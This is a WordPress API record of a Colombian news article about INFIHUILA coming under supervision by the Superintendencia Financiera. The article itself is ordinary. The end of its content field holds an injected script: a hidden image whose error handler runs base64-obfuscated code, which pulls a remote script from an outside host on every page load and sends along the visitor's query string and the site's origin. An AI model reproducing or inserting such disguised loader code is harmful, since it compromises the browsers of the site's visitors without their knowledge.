{"id":12888,"date":"2025-07-04T12:21:01","date_gmt":"2025-07-04T17:21:01","guid":{"rendered":"https:\/\/radiosurcolombiana.com\/wp\/?p=12888"},"modified":"2025-08-18T10:23:49","modified_gmt":"2025-08-18T15:23:49","slug":"el-infihuila-entra-bajo-vigilancia-de-la-superintendencia-financiera-de-colombia","status":"publish","type":"post","link":"https:\/\/radiosurcolombiana.com\/wp\/el-infihuila-entra-bajo-vigilancia-de-la-superintendencia-financiera-de-colombia\/","title":{"rendered":"El INFIHUILA entra bajo vigilancia de la Superintendencia Financiera de Colombia"},"content":{"rendered":"\n<p>El Instituto Financiero para el Desarrollo del Huila \u2013 INFIHUILA \u2013 ha sido incluido entre las entidades vigiladas por la Superintendencia Financiera de Colombia, lo que significa un logro en la historia econ\u00f3mica del departamento, abriendo una nueva etapa de oportunidades para el financiamiento del desarrollo territorial.<\/p>\n\n\n\n<p>Neiva, 3 de julio de 2025. Esta vigilancia directa garantiza que el INFIHUILA gestione adecuadamente los recursos p\u00fablicos, mantenga una s\u00f3lida salud financiera y act\u00fae con transparencia, eficiencia y modernizaci\u00f3n. A partir de ahora, el Instituto cuenta con respaldo legal para desempe\u00f1ar un rol m\u00e1s protag\u00f3nico como banca de desarrollo del Huila, generando mayor confianza entre ciudadanos, alcald\u00edas y entidades p\u00fablicas.<\/p>\n\n\n\n<p>\u201cEste es un logro muy importante para la Gobernaci\u00f3n, para el Plan de Desarrollo y por supuesto para el INFIHUILA, es que solamente hay cuatro INFIS del pa\u00eds vigilados por la Superfinanciera, a partir de hoy entra el Huila\u201d, explic\u00f3 el gobernador del Huila Rodrigo Villalba.<\/p>\n\n\n\n<p>Gracias a esta supervisi\u00f3n, INFIHUILA est\u00e1 facultado para:<\/p>\n\n\n\n<p>\u2022 Administrar los excedentes de liquidez de las alcald\u00edas y entes descentralizados del departamento.<br>\u2022 Acceder a fuentes de financiaci\u00f3n para apoyar los planes de desarrollo municipales y departamentales mediante cr\u00e9ditos responsables.<br>\u2022 Recaudar directamente ingresos del departamento como impuestos, estampillas y otros recursos propios.<br>\u2022 Gestionar recursos de redescuento provenientes de entidades nacionales como Findeter, Finagro y Banc\u00f3ldex.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"El INFIHUILA entra bajo vigilancia de la Superintendencia Financiera de Colombia\" width=\"1110\" height=\"624\" src=\"https:\/\/www.youtube.com\/embed\/fNjBpIOyiiM?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>A nivel nacional, solo cinco Institutos Financieros de Desarrollo (INFIS) cuentan con este nivel de vigilancia. INFIHUILA se suma a esta exclusiva lista junto a IDEA (Antioquia), INFIVALLE (Valle del Cauca), INFICALDAS (Caldas) e INFIMANIZALES (Manizales), lo que lo posiciona como un instituto modelo y con una s\u00f3lida proyecci\u00f3n de crecimiento.<\/p>\n\n\n\n<p>\u201cEl INFIHUILA ha sido merecedor de esta vigilancia especial, de los 15 institutos que existen en el pa\u00eds, los cuatro mas m\u00e1s grandes son los que est\u00e1n vigilados por la Superintendencia Financiera y son los que manejan mayor cantidad de recursos, ahora los bancos ser\u00e1n nuestros aliados estrat\u00e9gicos porque vamos a crecer en la capacidad de colocaci\u00f3n\u201d, explic\u00f3 la gerente del Instituto Financiero, Adriana Marcela Valencia Cardona.<\/p>\n\n\n\n<p>Este nuevo estatus se enmarca en el cumplimiento del r\u00e9gimen de control establecido en la Ley 819 de 2003, orientado a garantizar la estabilidad financiera de las entidades p\u00fablicas y el uso adecuado de los recursos. Para el INFIHUILA, significa un fortalecimiento institucional que permitir\u00e1 seguir impulsando el desarrollo econ\u00f3mico y social del Huila, adem\u00e1s de la regi\u00f3n surcolombiana.<\/p>\n\n\n\n<p>Este reconocimiento es reflejo del compromiso del Instituto con la eficiencia, la transparencia y la buena gesti\u00f3n, y lo proyecta como una entidad clave para dinamizar la econom\u00eda regional con respaldo, confianza y visi\u00f3n de futuro.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Instituto Financiero para el Desarrollo del Huila \u2013 INFIHUILA \u2013 ha sido incluido entre las entidades vigiladas por la Superintendencia Financiera de Colombia, lo que significa un logro en&hellip; <\/p>\n","protected":false},"author":2,"featured_media":12889,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_joinchat":[],"footnotes":""},"categories":[3,132,18],"tags":[],"class_list":["post-12888","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-comunidad","category-cultura","category-ciudad"],"_links":{"self":[{"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/posts\/12888","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/comments?post=12888"}],"version-history":[{"count":2,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/posts\/12888\/revisions"}],"predecessor-version":[{"id":13252,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/posts\/12888\/revisions\/13252"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/media\/12889"}],"wp:attachment":[{"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/media?parent=12888"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/categories?post=12888"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/tags?post=12888"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}